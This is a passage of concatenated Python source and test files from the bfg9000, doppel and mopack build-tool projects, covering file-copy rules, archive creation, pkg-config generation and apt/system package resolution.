makefile.rule.assert_called_once_with(
target=[result], deps=[src], order_only=[Path('dir/.dir')],
recipe=AlwaysEqual()
)
def test_extra_deps(self):
makefile = mock.Mock()
dep = self.context['generic_file']('dep.txt')
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](file=src, extra_deps=dep)
_copy_file.make_copy_file(result.creator, self.build, makefile,
self.env)
makefile.rule.assert_called_once_with(
target=[result], deps=[src, dep], order_only=[],
recipe=AlwaysEqual()
)
class TestNinjaBackend(BuiltinTest):
def test_simple(self):
ninjafile = mock.Mock()
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](file=src)
_copy_file.ninja_copy_file(result.creator, self.build, ninjafile,
self.env)
ninjafile.build.assert_called_once_with(
output=[result], rule='cp', inputs=src, implicit=[],
variables={}
)
def test_extra_deps(self):
ninjafile = mock.Mock()
dep = self.context['generic_file']('dep.txt')
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](file=src, extra_deps=dep)
_copy_file.ninja_copy_file(result.creator, self.build, ninjafile,
self.env)
ninjafile.build.assert_called_once_with(
output=[result], rule='cp', inputs=src, implicit=[dep],
variables={}
)
```
#### File: unit/tools/test_doppel.py
```python
from . import *
from bfg9000.tools.doppel import Doppel
class TestDoppel(ToolTestCase):
tool_type = Doppel
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('doppel'), Doppel)
def test_kind_args(self):
self.assertEqual(type(self.tool.kind_args('program')), list)
self.assertEqual(type(self.tool.kind_args('data')), list)
self.assertRaises(ValueError, self.tool.kind_args, 'unknown')
def test_call_onto(self):
self.assertEqual(self.tool('onto', 'src', 'dst'),
[self.tool, '-p', 'src', 'dst'])
def test_call_into(self):
self.assertEqual(self.tool('into', 'src', 'dst'),
[self.tool, '-ipN', 'src', 'dst'])
self.assertEqual(self.tool('into', ['src1', 'src2'], 'dst'),
[self.tool, '-ipN', 'src1', 'src2', 'dst'])
self.assertEqual(self.tool('into', 'src', 'dst', directory='dir'),
[self.tool, '-ipN', '-C', 'dir', 'src', 'dst'])
def test_call_archive(self):
self.assertEqual(self.tool('archive', 'src', 'dst', format='tar'),
[self.tool, '-ipN', '-f', 'tar', 'src', 'dst'])
self.assertEqual(
self.tool('archive', ['src1', 'src2'], 'dst', format='tar'),
[self.tool, '-ipN', '-f', 'tar', 'src1', 'src2', 'dst']
)
self.assertEqual(
self.tool('archive', 'src', 'dst', directory='dir', format='tar'),
[self.tool, '-ipN', '-f', 'tar', '-C', 'dir', 'src', 'dst']
)
self.assertEqual(
self.tool('archive', 'src', 'dst', format='tar',
dest_prefix='pre'),
[self.tool, '-ipN', '-f', 'tar', '-P', 'pre', 'src', 'dst']
)
def test_call_invalid(self):
self.assertRaises(TypeError, self.tool, 'unknown', 'src', 'dst')
```
#### File: unit/tools/test_internal.py
```python
from . import *
from bfg9000.safe_str import shell_literal
from bfg9000.shell.list import shell_list
from bfg9000.tools.internal import Bfg9000, Depfixer, JvmOutput, RccDep
class TestBfg9000(ToolTestCase):
tool_type = Bfg9000
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('bfg9000'), Bfg9000)
def test_refresh(self):
self.assertEqual(self.tool('refresh', 'builddir'),
[self.tool, 'refresh', 'builddir'])
def test_run(self):
self.assertEqual(self.tool('run', args=['echo', 'hi']),
[self.tool, 'run', '--', 'echo', 'hi'])
self.assertEqual(self.tool('run', args=['echo', 'hi'], initial=True),
[self.tool, 'run', '-I', '--', 'echo', 'hi'])
def test_call_invalid(self):
self.assertRaises(TypeError, self.tool, 'unknown')
class TestDepfixer(ToolTestCase):
tool_type = Depfixer
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('depfixer'), Depfixer)
def test_depfixer(self):
self.assertEqual(self.tool('depfile'), shell_list([
self.tool, shell_literal('<'), 'depfile', shell_literal('>>'),
'depfile'
]))
class TestJvmOutput(ToolTestCase):
tool_type = JvmOutput
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('jvmoutput'), JvmOutput)
def test_jvmoutput(self):
self.assertEqual(self.tool('output', ['echo', 'hi']),
[self.tool, '-o', 'output', '--', 'echo', 'hi'])
class TestRccDep(ToolTestCase):
tool_type = RccDep
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('rccdep'), RccDep)
def test_rccdep(self):
self.assertEqual(self.tool(['echo', 'hi'], 'depfile'),
[self.tool, 'echo', 'hi', '-d', 'depfile'])
```
#### File: unit/tools/test_yacc.py
```python
from .. import *
from bfg9000 import options as opts
from bfg9000.file_types import *
from bfg9000.languages import Languages
from bfg9000.path import Path, Root
from bfg9000.tools.yacc import YaccBuilder
known_langs = Languages()
with known_langs.make('yacc') as x:
x.vars(compiler='YACC', flags='YFLAGS')
class TestYaccBuilder(CrossPlatformTestCase):
def __init__(self, *args, **kwargs):
super().__init__(clear_variables=True, *args, **kwargs)
def setUp(self):
self.yacc = YaccBuilder(self.env, known_langs['yacc'], ['yacc'], True,
'version')
self.compiler = self.yacc.transpiler
def test_properties(self):
self.assertEqual(self.compiler.num_outputs, 1)
self.assertEqual(self.compiler.deps_flavor, None)
def test_call(self):
self.assertEqual(self.compiler('in', 'out'),
[self.compiler, 'in', '-o', 'out'])
self.assertEqual(self.compiler('in', 'out', ['flags']),
[self.compiler, 'flags', 'in', '-o', 'out'])
def test_default_name(self):
src = SourceFile(Path('file.l', Root.srcdir), 'yacc')
self.assertEqual(self.compiler.default_name(src, None),
['file.tab.c', 'file.tab.h'])
self.assertEqual(self.compiler.default_name(src, AttrDict(
user_options=opts.option_list(opts.lang('c++'))
)), ['file.tab.cpp', 'file.tab.hpp'])
with self.assertRaises(ValueError):
self.compiler.default_name(src, AttrDict(
user_options=opts.option_list(opts.lang('java'))
))
def test_output_file(self):
src = SourceFile(Path('file.tab.c'), 'c')
hdr = HeaderFile(Path('file.tab.h'), 'c')
self.assertEqual(self.compiler.output_file('file.tab.c', None), src)
self.assertEqual(self.compiler.output_file(
['file.tab.c', 'file.tab.h'], None
), [src, hdr])
src = SourceFile(Path('file.tab.cpp'), 'c++')
hdr = HeaderFile(Path('file.tab.hpp'), 'c++')
context = AttrDict(user_options=opts.option_list(opts.lang('c++')))
self.assertEqual(self.compiler.output_file('file.tab.cpp', context),
src)
self.assertEqual(self.compiler.output_file(
['file.tab.cpp', 'file.tab.hpp'], context
), [src, hdr])
with self.assertRaises(ValueError):
self.compiler.output_file(['file.tab.c', 'file.tab.h', 'extra'],
None)
def test_flags_empty(self):
self.assertEqual(self.compiler.flags(opts.option_list()), [])
def test_flags_define(self):
self.assertEqual(self.compiler.flags(opts.option_list(
opts.define('NAME')
)), ['-DNAME'])
self.assertEqual(self.compiler.flags(opts.option_list(
opts.define('NAME', 'value')
)), ['-DNAME=value'])
def test_flags_warning(self):
self.assertEqual(self.compiler.flags(opts.option_list(
opts.warning('disable')
)), ['-w'])
with self.assertRaises(ValueError):
self.compiler.flags(opts.option_list(opts.warning('all')))
def test_flags_lang(self):
self.assertEqual(self.compiler.flags(opts.option_list(
opts.lang('c++')
)), ['--language=c++'])
def test_flags_string(self):
self.assertEqual(self.compiler.flags(opts.option_list('-i')), ['-i'])
def test_flags_invalid(self):
with self.assertRaises(TypeError):
self.compiler.flags(opts.option_list(123))
``` |
{
"source": "jimporter/doppel",
"score": 3
} |
#### File: doppel/test/__init__.py
```python
import os
import unittest
from itertools import chain
this_dir = os.path.abspath(os.path.dirname(__file__))
test_data_dir = os.path.join(this_dir, 'data')
test_stage_dir = os.path.join(this_dir, 'stage')
def assertDirectory(path, contents):
path = os.path.normpath(path)
actual = set(os.path.normpath(os.path.join(path, base, f))
for base, dirs, files in os.walk(path)
for f in chain(files, dirs))
expected = set(os.path.normpath(os.path.join(path, i)) for i in contents)
if actual != expected:
missing = [os.path.relpath(i, path) for i in (expected - actual)]
extra = [os.path.relpath(i, path) for i in (actual - expected)]
raise unittest.TestCase.failureException(
'missing: {}, extra: {}'.format(missing, extra)
)
```
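A minimal usage sketch of the `assertDirectory` helper above (the temporary layout and the import path are hypothetical; in the real suite the helper arrives via `from .. import *`):
```python
import os
import tempfile
# Hypothetical usage sketch of the assertDirectory helper defined above.
# It walks `path` and requires the set of entries (files *and* directories,
# relative to `path`) to match `contents` exactly.
from test import assertDirectory  # hypothetical import path; adjust to your layout
with tempfile.TemporaryDirectory() as d:
    os.mkdir(os.path.join(d, 'subdir'))
    open(os.path.join(d, 'subdir', 'file.txt'), 'w').close()
    # Passes: both the directory and the file inside it are listed.
    assertDirectory(d, ['subdir', os.path.join('subdir', 'file.txt')])
    # Listing an entry that was never created (or omitting one that exists)
    # raises unittest.TestCase.failureException naming the missing/extra items.
```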
#### File: test/integration/test_archive.py
```python
import os
import shutil
import subprocess
import tarfile
import zipfile
from .. import *
from doppel import makedirs, mkdir
class TestArchive(unittest.TestCase):
def setUp(self):
self.stage = os.path.join(test_stage_dir, 'archive')
if os.path.exists(self.stage):
shutil.rmtree(self.stage)
makedirs(self.stage)
os.chdir(test_data_dir)
# Git doesn't store empty directories, so make one.
mkdir('empty_dir', exist_ok=True)
def test_archive_file(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {'file.txt'})
def test_archive_file_mode(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', '-m600', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {'file.txt'})
self.assertEqual(t.getmember('file.txt').mode, 0o600)
def test_archive_empty_dir(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', 'empty_dir', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {'empty_dir'})
def test_archive_full_dir(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', 'full_dir', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {'full_dir'})
def test_archive_full_dir_recursive(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', '-r', 'full_dir', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'full_dir',
'full_dir/file.txt',
})
def test_archive_multiple(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', '-r', 'empty_dir',
'full_dir', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'empty_dir',
'full_dir',
'full_dir/file.txt',
'file.txt',
})
    def test_archive_multiple_tar(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-ftar', '-r', 'empty_dir',
'full_dir', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'empty_dir',
'full_dir',
'full_dir/file.txt',
'file.txt',
})
    def test_archive_multiple_bzip2(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fbzip2', '-r', 'empty_dir',
'full_dir', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'empty_dir',
'full_dir',
'full_dir/file.txt',
'file.txt',
})
def test_archive_multiple_zip(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fzip', '-r', 'empty_dir',
'full_dir', 'file.txt', dst])
with zipfile.ZipFile(dst) as t:
self.assertEqual(set(t.namelist()), {
'empty_dir/',
'full_dir/',
'full_dir/file.txt',
'file.txt',
})
def test_archive_prefix(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', '-r', '--dest-prefix',
'prefix', 'empty_dir', 'full_dir', 'file.txt',
dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'prefix/empty_dir',
'prefix/full_dir',
'prefix/full_dir/file.txt',
'prefix/file.txt',
})
```
#### File: test/integration/test_errors.py
```python
import subprocess
from .. import *
def check_output(command):
return subprocess.check_output(command, stderr=subprocess.STDOUT,
universal_newlines=True)
class TestErrors(unittest.TestCase):
def test_onto_and_format(self):
with self.assertRaises(subprocess.CalledProcessError):
check_output(['doppel', '--onto', '--format', 'zip', 'dest'])
def test_dest_prefix_without_format(self):
with self.assertRaises(subprocess.CalledProcessError):
check_output(['doppel', '--dest-prefix', 'prefix', 'dest'])
def test_onto_multiple_sources(self):
with self.assertRaises(subprocess.CalledProcessError):
check_output(['doppel', '--onto', 'src1', 'src2', 'dest'])
def test_dest_nonexistent(self):
os.chdir(test_data_dir)
with self.assertRaises(subprocess.CalledProcessError) as e:
check_output(['doppel', '--into', 'src', 'nonexist'])
self.assertEqual(e.exception.output,
"doppel: directory 'nonexist' does not exist\n")
def test_dest_is_not_directory(self):
os.chdir(test_data_dir)
with self.assertRaises(subprocess.CalledProcessError) as e:
check_output(['doppel', '--into', 'src', 'file.txt'])
self.assertEqual(e.exception.output,
"doppel: 'file.txt' is not a directory\n")
def test_make_parents_dest_is_not_directory(self):
os.chdir(test_data_dir)
with self.assertRaises(subprocess.CalledProcessError) as e:
check_output(['doppel', '--into', '-p', 'src', 'file.txt'])
self.assertEqual(e.exception.output,
"doppel: 'file.txt' is not a directory\n")
```
#### File: test/unit/test_remove.py
```python
import os
import platform
import shutil
from .. import *
from doppel import makedirs, remove
platform_name = platform.system()
class TestRemove(unittest.TestCase):
def setUp(self):
self.stage = os.path.join(test_stage_dir, 'remove')
if os.path.exists(self.stage):
shutil.rmtree(self.stage)
makedirs(self.stage)
os.chdir(test_data_dir)
def test_remove(self):
dst = os.path.join(self.stage, 'file.txt')
open(dst, 'w').close()
remove(dst)
self.assertFalse(os.path.exists(dst))
def test_remove_dir(self):
dst = os.path.join(self.stage, 'subdir')
makedirs(dst)
self.assertRaises(OSError, remove, dst)
shutil.rmtree(dst)
def test_remove_nonexist(self):
dst = os.path.join(self.stage, 'file.txt')
self.assertRaises(OSError, remove, dst)
remove(dst, nonexist_ok=True)
``` |
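The tests above pin down `remove`'s contract; a minimal usage sketch (assuming the `doppel` package is installed) looks like this:
```python
import os
import tempfile
from doppel import remove
# Sketch of the behavior exercised by TestRemove above: remove() deletes a
# file, raises OSError for a directory or a missing path, and only tolerates
# a missing path when nonexist_ok=True.
with tempfile.TemporaryDirectory() as d:
    f = os.path.join(d, 'file.txt')
    open(f, 'w').close()
    remove(f)                    # file is deleted
    try:
        remove(f)                # already gone -> OSError
    except OSError:
        pass
    remove(f, nonexist_ok=True)  # missing, but explicitly tolerated
```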
{
"source": "jimporter/mopack",
"score": 2
} |
#### File: mopack/mopack/package_defaults.py
```python
import os
import re
from pkg_resources import resource_filename
from yaml.error import MarkedYAMLError
from . import expression as expr, iterutils, types
from .objutils import memoize
from .yaml_tools import load_file, SafeLineLoader
class DefaultConfig:
_known_genera = {'source', 'usage'}
def __init__(self, filename):
with load_file(filename, Loader=SafeLineLoader) as cfg:
for genus, genus_cfg in cfg.items():
if genus not in self._known_genera:
msg = 'unknown genus {!r}'.format(genus)
raise MarkedYAMLError(None, None, msg,
cfg.marks[genus].start)
self._process_genus(genus_cfg)
self._data = cfg
def _process_genus(self, data):
for species, cfgs in data.items():
if iterutils.isiterable(cfgs):
for i, cfg in enumerate(cfgs):
if i < len(cfgs) - 1 and 'if' not in cfg:
ctx = 'while parsing default for {!r}'.format(species)
msg = ('default config has no `if` field, but is ' +
'not last entry of list')
raise MarkedYAMLError(ctx, cfgs.mark.start, msg,
cfg.mark.start)
cfgs[i] = self._parse_default_fields(cfg)
else:
data[species] = self._parse_default_fields(cfgs)
def _parse_default_fields(self, data):
def parse_recursive(data):
if isinstance(data, str):
return expr.parse(data)
elif isinstance(data, (dict, list)):
for k, v in iterutils.iteritems(data):
data[k] = parse_recursive(v)
return data
return data
for k, v in data.items():
if k == 'if':
if isinstance(v, str):
data[k] = expr.parse(v, if_context=True)
else:
data[k] = parse_recursive(v)
return data
@staticmethod
def _if_evaluate(symbols, expression):
if isinstance(expression, bool):
return expression
return expression(symbols)
@classmethod
def _evaluate_recursive(cls, symbols, data):
if isinstance(data, expr.Token):
return data(symbols)
elif isinstance(data, list):
return [cls._evaluate_recursive(symbols, i) for i in data]
elif isinstance(data, dict):
return {k: cls._evaluate_recursive(symbols, v)
for k, v in data.items()}
return data
@classmethod
def _select_from_list(cls, symbols, data):
if isinstance(data, list):
for i in data:
if cls._if_evaluate(symbols, i.get('if', True)):
return i
return data
def get(self, symbols, genus, species, field, default=None):
if genus not in self._known_genera:
raise ValueError('unknown genus {!r}'.format(genus))
defaults = self._data.get(genus, {})
if species in defaults:
fields = self._select_from_list(symbols, defaults[species])
if field in fields:
return self._evaluate_recursive(symbols, fields[field])
fields = self._select_from_list(symbols, defaults.get('*', {}))
return self._evaluate_recursive(symbols, fields.get(field, default))
@memoize
def _get_default_config(package_name):
if re.search(r'\W', package_name):
return None
path = resource_filename('mopack', 'defaults/{}.yml'.format(package_name))
if os.path.exists(path):
return DefaultConfig(path)
return None
def get_default(symbols, package_name, genus, species, field, default=None):
default_cfg = _get_default_config(package_name)
if default_cfg is None:
return default
return default_cfg.get(symbols, genus, species, field, default)
class DefaultResolver:
def __init__(self, obj, symbols, name=None):
self.package_name = name or obj.name
self.genus = obj._default_genus
self.species = getattr(obj, obj._type_field)
self.symbols = symbols
def __call__(self, other, field=None, default=None, extra_symbols=None):
forced_field = field
symbols = dict(**self.symbols, **(extra_symbols or {}))
def check(field, value):
if value is types.Unset:
value = get_default(
symbols, self.package_name, self.genus, self.species,
forced_field or field, default
)
return other(field, value)
return check
```
#### File: mopack/mopack/pkg_config.py
```python
import os
from .path import Path
from .shell import quote_native, ShellArguments
def _write_variable(out, name, value):
if value is None:
return False
elif not isinstance(value, str):
raise TypeError(type(value))
out.write('{}={}\n'.format(name, value))
return True
def _write_field(out, name, value, var_symbols={}):
if value is None:
return False
elif isinstance(value, ShellArguments):
value = ' '.join(value.fill(
lambda s, orig: quote_native(s, force=isinstance(orig, Path)),
**var_symbols
))
elif not isinstance(value, str):
raise TypeError(type(value))
out.write('{}: {}\n'.format(name, value))
return True
def generated_pkg_config_dir(pkgdir):
return os.path.join(pkgdir, 'pkgconfig')
def write_pkg_config(out, name, *, desc='mopack-generated package',
version='', cflags=None, libs=None, variables={}):
out.write('# Do not edit this file! It was automatically generated by ' +
'mopack.\n\n')
wrote_var = False
for k, v in variables.items():
wrote_var |= _write_variable(out, k, v)
if wrote_var:
out.write('\n')
var_symbols = {k: '${{{}}}'.format(k) for k, v in variables.items()
if v is not None}
_write_field(out, 'Name', name, var_symbols)
_write_field(out, 'Description', desc, var_symbols)
_write_field(out, 'Version', version, var_symbols)
_write_field(out, 'Cflags', cflags, var_symbols)
_write_field(out, 'Libs', libs, var_symbols)
```
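For orientation, a small usage sketch of `write_pkg_config` from the module above; the package name, flags, and variables here are made up for illustration:
```python
import io
from mopack.pkg_config import write_pkg_config
# Writes a pkg-config file into an in-memory buffer: a generated-by comment,
# the variable definitions, a blank line, then the Name/Description/Version/
# Cflags/Libs fields. Plain strings are passed through unchanged.
buf = io.StringIO()
write_pkg_config(
    buf, 'hello',
    version='1.0',
    cflags='-I${includedir}',
    libs='-L${libdir} -lhello',
    variables={'prefix': '/usr/local',
               'includedir': '${prefix}/include',
               'libdir': '${prefix}/lib'},
)
print(buf.getvalue())
```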
#### File: mopack/mopack/platforms.py
```python
import platform
import subprocess
from .objutils import memoize
def framework(name):
return {'type': 'framework', 'name': name}
_package_library_names = {
'posix': {
'gl': 'GL',
'glu': 'GLU',
'zlib': 'z',
},
'darwin': {
'gl': framework('OpenGL'),
'glu': framework('OpenGL'),
'glut': framework('GLUT'),
},
'windows': {
'gl': 'opengl32',
'glu': 'glu32',
'glut': 'glut32',
},
}
@memoize
def platform_name():
system = platform.system().lower()
if system.startswith('cygwin'):
return 'cygwin'
elif system == 'windows':
try:
uname = subprocess.check_output(
'uname', universal_newlines=True
).lower()
if uname.startswith('cygwin'):
return 'cygwin'
except OSError:
pass
return system
def package_library_name(platform, package):
try:
mapping = _package_library_names[platform]
except KeyError:
mapping = _package_library_names['posix']
return mapping.get(package, package)
```
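A few concrete lookups against the table above; the behavior follows directly from the code, and the calls assume the `mopack` package is importable:
```python
from mopack.platforms import package_library_name, platform_name
# Platforms missing from the table fall back to the 'posix' mapping, and
# packages missing from a mapping are returned unchanged.
assert package_library_name('windows', 'gl') == 'opengl32'
assert package_library_name('linux', 'zlib') == 'z'        # posix fallback
assert package_library_name('darwin', 'glut') == {'type': 'framework',
                                                  'name': 'GLUT'}
assert package_library_name('posix', 'somelib') == 'somelib'
# platform_name() is memoized and reports 'cygwin' even when a Cygwin
# environment runs on top of a Windows Python.
print(platform_name())
```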
#### File: mopack/sources/apt.py
```python
import subprocess
from itertools import chain
from . import BinaryPackage
from .. import log, types
from ..environment import get_cmd
from ..iterutils import uniques
class AptPackage(BinaryPackage):
source = 'apt'
_version = 1
@staticmethod
def upgrade(config, version):
return config
def __init__(self, name, *, remote=None, repository=None, usage='system',
**kwargs):
super().__init__(name, usage=usage, **kwargs)
T = types.TypeCheck(locals(), self._expr_symbols)
T.remote(types.maybe(
types.list_of(types.string, listify=True, allow_empty=False),
default=['lib{}-dev'.format(name)]
))
T.repository(types.maybe(types.string))
def guessed_version(self, pkgdir):
# XXX: Maybe try to de-munge the version into something not
# apt-specific?
dpkgq = get_cmd(self._common_options.env, 'DPKG_QUERY', 'dpkg-query')
return subprocess.run(
dpkgq + ['-W', '-f${Version}', self.remote[0]],
check=True, stdout=subprocess.PIPE, universal_newlines=True
).stdout
@classmethod
def resolve_all(cls, packages, pkgdir):
for i in packages:
log.pkg_resolve(i.name, 'from {}'.format(cls.source))
env = packages[0]._common_options.env
apt = get_cmd(env, 'APT_GET', 'sudo apt-get')
aptrepo = get_cmd(env, 'ADD_APT_REPOSITORY', 'sudo add-apt-repository')
remotes = list(chain.from_iterable(i.remote for i in packages))
repositories = uniques(i.repository for i in packages if i.repository)
with log.LogFile.open(pkgdir, 'apt') as logfile:
for i in repositories:
logfile.check_call(aptrepo + ['-y', i])
logfile.check_call(apt + ['update'])
logfile.check_call(apt + ['install', '-y'] + remotes)
for i in packages:
i.resolved = True
@staticmethod
def deploy_all(packages, pkgdir):
pass
```
#### File: mopack/sources/system.py
```python
from . import BinaryPackage
from .. import log
from ..types import FieldKeyError, Unset
class SystemPackage(BinaryPackage):
source = 'system'
_version = 1
@staticmethod
def upgrade(config, version):
return config
def __init__(self, name, *, version=Unset, auto_link=Unset,
include_path=Unset, library_path=Unset, headers=Unset,
libraries=Unset, compile_flags=Unset, link_flags=Unset,
submodule_map=Unset, usage=Unset, **kwargs):
if usage is not Unset:
raise FieldKeyError((
"'system' package doesn't accept 'usage' attribute; " +
"pass usage options directly"
), 'usage')
super().__init__(name, usage={
'type': 'system', 'auto_link': auto_link, 'version': version,
'include_path': include_path, 'library_path': library_path,
'headers': headers, 'libraries': libraries,
'compile_flags': compile_flags, 'link_flags': link_flags,
'submodule_map': submodule_map,
}, _usage_field=None, **kwargs)
def resolve(self, pkgdir):
log.pkg_resolve(self.name, 'from {}'.format(self.source))
self.resolved = True
def deploy(self, pkgdir):
pass
def fallback_system_package(name, options):
pkg = SystemPackage(name, config_file=None, _options=options)
pkg.resolved = True
return pkg
```
#### File: jimporter/mopack/setup.py
```python
import json
import os
import re
import subprocess
from setuptools import setup, find_packages, Command
from mopack.app_version import version
root_dir = os.path.abspath(os.path.dirname(__file__))
class Coverage(Command):
description = 'run tests with code coverage'
user_options = [
('test-suite=', 's',
"test suite to run (e.g. 'some_module.test_suite')"),
]
def initialize_options(self):
self.test_suite = None
def finalize_options(self):
pass
def _make_subproc_rc(self):
# For reasons I don't fully understand, coverage.py doesn't correctly
# cover files in integration tests using our normal `.coveragerc`. To
# fix this, change that line to `include = ${TOP}/mopack/*` so we get
# full coverage. We don't do this universally, since using `source`
# makes sure that if we run a subset of tests, coverage.py picks up
# files with 0 coverage.
with open(os.path.join(root_dir, '.coveragerc')) as f:
rc = f.read()
fixed = rc.replace('source = mopack', 'include = ${TOP}/mopack/*')
result = os.path.join(root_dir, '.coveragerc-subproc')
with open(result, 'w') as f:
f.write(fixed)
return result
def run(self):
env = dict(os.environ)
pythonpath = os.path.join(root_dir, 'test', 'scripts')
if env.get('PYTHONPATH'):
pythonpath += os.pathsep + env['PYTHONPATH']
env.update({
'TOP': root_dir,
'PYTHONPATH': pythonpath,
'COVERAGE_FILE': os.path.join(root_dir, '.coverage'),
'COVERAGE_PROCESS_START': self._make_subproc_rc(),
})
subprocess.run(['coverage', 'erase'], check=True)
subprocess.run(
['coverage', 'run', 'setup.py', 'test'] +
(['-q'] if self.verbose == 0 else []) +
(['-s', self.test_suite] if self.test_suite else []),
env=env, check=True
)
subprocess.run(['coverage', 'combine'], check=True,
stdout=subprocess.DEVNULL)
custom_cmds = {
'coverage': Coverage,
}
try:
from verspec.python import Version
class DocServe(Command):
description = 'serve the documentation locally'
user_options = [
('working', 'w', 'use the documentation in the working directory'),
('dev-addr=', None, 'address to host the documentation on'),
]
def initialize_options(self):
self.working = False
self.dev_addr = '0.0.0.0:8000'
def finalize_options(self):
pass
def run(self):
cmd = 'mkdocs' if self.working else 'mike'
subprocess.run([
cmd, 'serve', '--dev-addr=' + self.dev_addr
], check=True)
class DocDeploy(Command):
description = 'push the documentation to GitHub'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
v = Version(version)
alias = 'dev' if v.is_devrelease else 'latest'
title = '{} ({})'.format(v.base_version, alias)
short_version = '{}.{}'.format(*v.release[:2])
try:
info = json.loads(subprocess.run(
['mike', 'list', '-j', alias], universal_newlines=True,
check=True, stdout=subprocess.PIPE
                ).stdout)
except subprocess.CalledProcessError:
info = None
if info and info['version'] != short_version:
t = re.sub(r' \({}\)$'.format(re.escape(alias)), '',
info['title'])
subprocess.run(['mike', 'retitle', info['version'], t],
check=True)
subprocess.run(['mike', 'deploy', '-ut', title, short_version,
alias], check=True)
custom_cmds['doc_serve'] = DocServe
custom_cmds['doc_deploy'] = DocDeploy
except ImportError:
pass
try:
from flake8.main.application import Application as Flake8
class LintCommand(Command):
description = 'run flake8 on source code'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def distribution_files(self):
return ['setup.py', 'mopack', 'test']
def run(self):
flake8 = Flake8()
flake8.initialize([])
flake8.run_checks(list(self.distribution_files()))
flake8.formatter.start()
flake8.report_errors()
flake8.report_statistics()
flake8.report_benchmarks()
flake8.formatter.stop()
try:
flake8.exit()
except SystemExit as e:
# If successful, don't exit. This allows other commands to run
# too.
if e.code:
raise
custom_cmds['lint'] = LintCommand
except ImportError:
pass
with open(os.path.join(root_dir, 'README.md'), 'r') as f:
# Read from the file and strip out the badges.
long_desc = re.sub(r'(^# mopack)\n\n(.+\n)*', r'\1', f.read())
setup(
name='mopack',
version=version,
description='A multiple-origin package manager',
long_description=long_desc,
long_description_content_type='text/markdown',
keywords='package manager',
url='https://github.com/jimporter/mopack',
author='<NAME>',
author_email='<EMAIL>',
license='BSD',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
packages=find_packages(exclude=['test', 'test.*']),
package_data={'': ['defaults/*.yml']},
install_requires=['colorama', 'pyparsing', 'pyyaml', 'setuptools'],
extras_require={
'dev': ['bfg9000', 'conan', 'coverage', 'flake8 >= 3.6',
'mike >= 0.3.1', 'mkdocs-bootswatch', 'shtab'],
'test': ['bfg9000', 'conan', 'coverage', 'flake8 >= 3.6', 'shtab'],
},
entry_points={
'console_scripts': [
'mopack=mopack.driver:main'
],
'mopack.sources': [
'apt=mopack.sources.apt:AptPackage',
'conan=mopack.sources.conan:ConanPackage',
'directory=mopack.sources.sdist:DirectoryPackage',
'git=mopack.sources.sdist:GitPackage',
'system=mopack.sources.system:SystemPackage',
'tarball=mopack.sources.sdist:TarballPackage',
],
'mopack.builders': [
'bfg9000=mopack.builders.bfg9000:Bfg9000Builder',
'cmake=mopack.builders.cmake:CMakeBuilder',
'custom=mopack.builders.custom:CustomBuilder',
'none=mopack.builders.none:NoneBuilder',
],
'mopack.usage': [
'path=mopack.usage.path_system:PathUsage',
'pkg_config=mopack.usage.pkg_config:PkgConfigUsage',
'system=mopack.usage.path_system:SystemUsage',
],
},
test_suite='test',
cmdclass=custom_cmds,
)
```
#### File: test/integration/test_apt.py
```python
import json
import os
from unittest import skipIf
from . import *
@skipIf('apt' not in test_features,
'skipping apt tests; add `apt` to `MOPACK_EXTRA_TESTS` to enable')
class TestApt(IntegrationTest):
name = 'apt'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-apt.yml')
self.assertPopen(['mopack', 'resolve', config],
extra_env={'PKG_CONFIG': 'nonexist'})
self.assertExists('mopack/logs/apt.log')
self.assertExists('mopack/mopack.json')
self.assertPathUsage('ogg', type='system', version=AlwaysEqual())
self.assertPathUsage('zlib', type='system', version=AlwaysEqual(),
libraries=['z'])
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(),
'packages': [
cfg_apt_pkg(
'ogg', config,
remote=['libogg-dev'],
usage=cfg_system_usage(
pcfile='ogg',
